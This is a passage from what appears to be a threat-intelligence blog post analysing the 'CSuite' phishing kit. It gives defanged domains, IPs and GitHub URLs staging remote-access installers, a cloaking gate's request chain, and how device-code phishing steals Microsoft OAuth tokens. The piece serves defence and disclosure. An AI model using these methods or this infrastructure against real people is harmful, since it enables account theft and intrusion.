                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Credential harvester                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        pdfsecurtoviewothers[.]sbs,pdfsecurtoviewothers[.]cfd                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Post-capture redirect                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        corporate-sync-gate[.]net, legacy-bridge-node[.]net                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Impersonating a real organisation                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        ambitiousaboutautismorguk[.]com,solarengyloanfunds[.]com                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Shared-hosting account and its certificates                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        greenbullet[.]ba, gddfzxa[.]online, ghs.coorpes[.]com,greaterheights[.]sbs, mmswerod[.]sbs                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-385'>
table#wpdtSimpleTable-385{ table-layout: fixed !important; }
table#wpdtSimpleTable-385 td, table.wpdtSimpleTable385 th { white-space: normal !important; }
</style>



<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="597" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry-1024x597.png" alt="The domain registry: hostname, role, anti-bot setting, geographic filter, worker binding and date added, for each of the 38 domains" class="wp-image-23256" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry-1024x597.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry-300x175.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry-768x448.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry-1536x895.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry-370x216.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry-270x157.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry-740x431.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-domain-registry.png 1741w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The domain registry: hostname, role, anti-bot setting, geographic filter, worker binding and date added, for each of the 38 domains</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The Auto Redirect module shows how those hosts chain. A visitor who enters an address on pdfsecurtoview[.]sbs — 61 clicks recorded — is routed by provider: Microsoft accounts to pdfsecurtoview365[.]sbs, Google accounts to corporate-sync-gate[.]net, everything else to the Chameleon harvester. Three redirectors send Microsoft victims to /verify/&lt;uuid&gt; paths on two domains that read as real organisations. ambitiousaboutautismorguk[.]com collapses the address of a UK autism charity into a single .com label, and solarengyloanfunds[.]com drops a letter from the name of an energy loan fund that already appears in the panel’s own victim list. Both are registrations of the group’s own, built to survive a glance at the address bar. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="569" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect-1024x569.png" alt="Auto Redirect: per-provider routing of the victim after the mail address is entered" class="wp-image-23257" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect-1024x569.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect-768x427.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect-1536x854.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect-740x412.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Auto-Redirect.png 2023w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Auto Redirect: per-provider routing of the victim after the mail address is entered</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite--1024x578.png" alt="Worker Links: Cloudflare workers.dev reverse proxies stood up to keep the real domain out of the victim’s address bar" class="wp-image-23258" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite--1024x578.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite--300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite--768x433.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite--1536x867.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite--370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite--270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite--740x418.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-.png 2015w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Worker Links: Cloudflare workers.dev reverse proxies stood up to keep the real domain out of the victim’s address bar</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Payload staging on a public code-hosting account. The ScreenConnect installers pushed by the delivery arm are served straight from a public GitHub account, Ivan3900. Two of its raw URLs appear in the campaign’s own delivery telemetry — github[.]com/Ivan3900/mobi/raw/main/ScreenConnect.ClientSetup.msi and github[.]com/Ivan3900/jppp/raw/main/ScreenConnect.ClientSetup.msi, both uploaded on 18 August 2026 — and a third is the one the licensing-themed batch dropper calls, github[.]com/Ivan3900/test/raw/main/ScreenConnect.ClientSetup.msi, uploaded on 31 August 2026. The mobi and test copies are the same file; jppp carries its own build pointed at a different relay. The account holds nine repositories of this kind: lure pages committed as index.html, and beside them the installers each page hands out. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="570" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github-1024x570.png" alt="The GitHub profile with malicious repository" class="wp-image-23259" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github-1024x570.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github-768x428.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github-1536x855.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github-740x412.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-github.png 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The GitHub profile with malicious repository</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The staged installers point at self-hosted ScreenConnect servers of their own. Four are configured across the set, all with guest access parameters: </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-384"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="5"
           data-wpID="384"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Relay                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Port                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Notes                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        91.92.41[.]114                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        8041                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Staged in three of the repositories                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        212.189.40[.]73                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        8041                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        One repository                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        155.254.26[.]180                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        8041                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        One repository, delivered under an Adobe name                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        64.204.180[.]203                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        8040                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Pulled by a batch dropper asAdobe.ClientSetup.msi                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-384'>
table#wpdtSimpleTable-384{ table-layout: fixed !important; }
table#wpdtSimpleTable-384 td, table.wpdtSimpleTable384 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">The same account shows how wide the remote-management arsenal runs. Alongside ScreenConnect it stages Action1 agents renamed to Adobe_Acrobat_V6trj.msi and Dotloop AgentSetup_V34.msi, an Atera build, and two 20 MB agents carrying Syncro strings under the names Adobe_AgentInstallerV367.exe and Dotloop_AgentInstallerV367.exe. Delivery telemetry adds a fifth vendor: PDQConnectAgent_ZoomUpdater.msi, served 46 times from a Cloudflare R2 bucket alongside Zoom_InstallerX64.zip. </p>



<p class="wp-block-paragraph"><strong>Two sending relays with their own DKIM.</strong> Lure mail leaves through mail.wirsann[.]com (188.127.227[.]18) and mail.boratlongyear[.]com (141.133.174[.]208), both on 587/STARTTLS with a PowerMTA port on 2525. Each has a default._domainkey DKIM record published, so the selector enumerates every sending domain configured against the relay.  </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="574" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-1024x574.png" alt="The SMTP module: two sending relays with credentials, and the Cloudflare nameserver pair the operator configures at the registrar." class="wp-image-23260" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-1024x574.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-300x168.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-768x431.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-1536x861.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-2048x1149.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-270x151.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/SMTP-module-740x415.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The SMTP module: two sending relays with credentials, and the Cloudflare nameserver pair the operator configures at the registrar</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">Other Attacks Found During the Investigation </h2>



<p class="wp-block-paragraph">The same tooling and infrastructure also appeared in additional attacks that exposed different parts of the CSuite workflow. These cases help show how the operation adapts its delivery and capture methods while keeping the same underlying components. </p>



<h3 class="wp-block-heading">A Complete Deployment, Gate and Capture in One Visit </h3>



<p class="wp-block-paragraph">The Adobe exports and the DocuSign build both deliver software. A third deployment of the same kit, captured in a public sandbox run on 7 July 2026, does the other job of the operation: it takes credentials, and it does so through the Chameleon module described above. It is also the run that yielded the m/js/utils.js gate examined at the start of this report — the same kit with none of its parts missing: <a href="https://app.any.run/tasks/54ed5064-d534-418f-9a11-d0315937fc43?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ANY.RUN session</a>. </p>



<p class="wp-block-paragraph">It runs from /upload/cgi/ on a compromised Australian escrow site, escrowadmin[.]com[.]au, and the entry link carries the target’s own address in the query string. Every step between that link and the login form is a gate: </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-383"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="8"
           data-wpID="383"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Step                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Request                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Purpose                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        1                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        index.html?ref=<email>                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        A page titled Verification: a dark loading screen and no content                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        2                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        config_recaptcha_public.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Site key for reCAPTCHA v3, held in server-side configuration                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        3                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        m/js/utils.js, m/js/captcha.js,m/js/fingerprint.js                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        The gate itself                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        4                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        process.php?key=...&type=human&ref=<email>                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Verdict recorded server-side, answered with a 302                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        5                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        router.php?vtoken=...&vtime=...→ direct_loader.php?vtoken=...                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        A one-time token and a timestamp, two more redirects                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        6                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        providers/chameleon.php?ref=<base64 email>                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        The credential page                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        7                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        blacklist_api.php                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        The verdict posted back for reuse                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-383'>
table#wpdtSimpleTable-383{ table-layout: fixed !important; }
table#wpdtSimpleTable-383 td, table.wpdtSimpleTable383 th { white-space: normal !important; }
</style>



<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-page-verification-1024x578.jpg" alt="Step one. A page called Verification shows a loading animation while the gate runs" class="wp-image-23261" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-page-verification-1024x578.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-page-verification-300x169.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-page-verification-768x434.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-page-verification-370x209.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-page-verification-270x152.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-page-verification-740x418.jpg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-page-verification.jpg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Step one. A page called Verification shows a loading animation while the gate runs</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Server-side pieces sit on both sides of the browser checks: the verdict is recorded by <strong>process.php</strong> before the visitor moves on, the hop to the credential page is licensed by a token with a timestamp, and <strong>blacklist_api.php</strong> takes the outcome back so a refused visitor stays refused. The Adobe exports carry the browser-side calls of this design and none of the server side, which is why their cloaking does nothing at all. </p>



<h3 class="wp-block-heading">Device-Code Phishing Attacks </h3>



<p class="wp-block-paragraph">Alongside credential phishing, <strong>CSuite uses a device-code flow that does not require the victim to enter a password on the phishing page</strong>. Instead, the victim receives a short code and is directed to Microsoft’s legitimate device-login page. Entering the code authorizes the attacker-initiated OAuth request, giving the operator access and refresh tokens. </p>



<p class="wp-block-paragraph">The three observed samples use the same Next.js frontend. The page loads its lure configuration from <strong>/api/lure/config</strong>, initiates the device-code request through <strong>/api/initiate</strong>, copies the user code to the clipboard, and polls <strong>/api/status</strong> until authentication is completed. </p>



<p class="wp-block-paragraph">The bundle includes seven lure templates: <strong>Teams, voicemail, SharePoint, DocuSign, Adobe, WeTransfer, and DocSend</strong>, each with its own branding and call to action. </p>



<p class="wp-block-paragraph"><strong>Sample (PDF Viewer): </strong><a href="https://app.any.run/tasks/10ecee38-5f29-421a-9d6a-9e516ba4deeb/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN session</strong></a> </p>



<p class="wp-block-paragraph">Host docsendsr[.]online, <strong>adobe </strong>template. The page draws an Adobe Acrobat reader with a five-page document behind a modal, titled <strong>&#8220;Secure PDF Download&#8221;,</strong> and offers one control: <strong>Verify with Microsoft</strong>. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Device-Code-Phishing-1024x578.jpg" alt="The example of Device Code Phishing with PDF Viewer lure page " class="wp-image-23262" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Device-Code-Phishing-1024x578.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Device-Code-Phishing-300x169.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Device-Code-Phishing-768x434.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Device-Code-Phishing-370x209.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Device-Code-Phishing-270x152.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Device-Code-Phishing-740x418.jpg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Device-Code-Phishing.jpg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The example of Device Code Phishing with PDF Viewer lure page</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The click produces the code presented as &#8220;YOUR VERIFICATION CODE&#8221; with a copy button and the instruction to paste it on the Microsoft sign-in page. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-verification-1024x578.jpg" alt="Fake verification code displayed inside ANY.RUN sandbox " class="wp-image-23263" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-verification-1024x578.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-verification-300x169.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-verification-768x434.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-verification-370x209.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-verification-270x152.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-verification-740x418.jpg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-verification.jpg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake verification code displayed inside ANY.RUN sandbox</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">Continuing opens the genuine Microsoft Login page in a second window, with the code already on the clipboard. Everything the victim sees from this point is Microsoft&#8217;s. </p>



<p class="wp-block-paragraph"><strong>Sample (SharePoint): </strong><a href="https://app.any.run/tasks/a7708e0e-cb8d-4f78-941f-a1f4c948f3ff/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN session</strong></a> </p>



<p class="wp-block-paragraph">Host selectivelife03[.]sbs, <strong>sharepoint</strong><strong> </strong>template, served over plain HTTP. The background is a mock SharePoint library, &#8220;Documents › Shared with me&#8221; with blurred tiles for Q4_Report.xlsx, Project_Plan.docx and others, and the modal names one file, ENCRYPTED_DOCUMENT.PDF, while it &#8220;prepares secure verification&#8221;. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-1024x578.jpg" alt="The example of Device Code Phishing with SharePoint lure page" class="wp-image-23264" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-1024x578.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-300x169.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-768x434.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-370x209.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-270x152.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-740x418.jpg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint.jpg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The example of Device Code Phishing with SharePoint lure page</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The code arrives with numbered instructions: copy the code, click continue, paste it to verify. The three-step wording exists because the flow needs the victim to carry the code across to another site. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-lure-page-1024x578.jpg" alt="The example of Device Code Phishing with SharePoint lure page " class="wp-image-23265" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-lure-page-1024x578.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-lure-page-300x169.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-lure-page-768x434.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-lure-page-370x209.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-lure-page-270x152.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-lure-page-740x418.jpg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sharepoint-lure-page.jpg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The example of Device Code Phishing with SharePoint lure page </em></figcaption></figure>
</div>


<p class="wp-block-paragraph">he device-login window opens with the code already typed into Microsoft&#8217;s field, and the lure switches its button to &#8220;Copied!&#8221;. </p>



<p class="wp-block-paragraph"><strong>Sample (Voice mail):  </strong><a href="https://app.any.run/tasks/e6919ac3-112f-468a-bbd5-d09f8eea6a84/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN session</strong></a> </p>



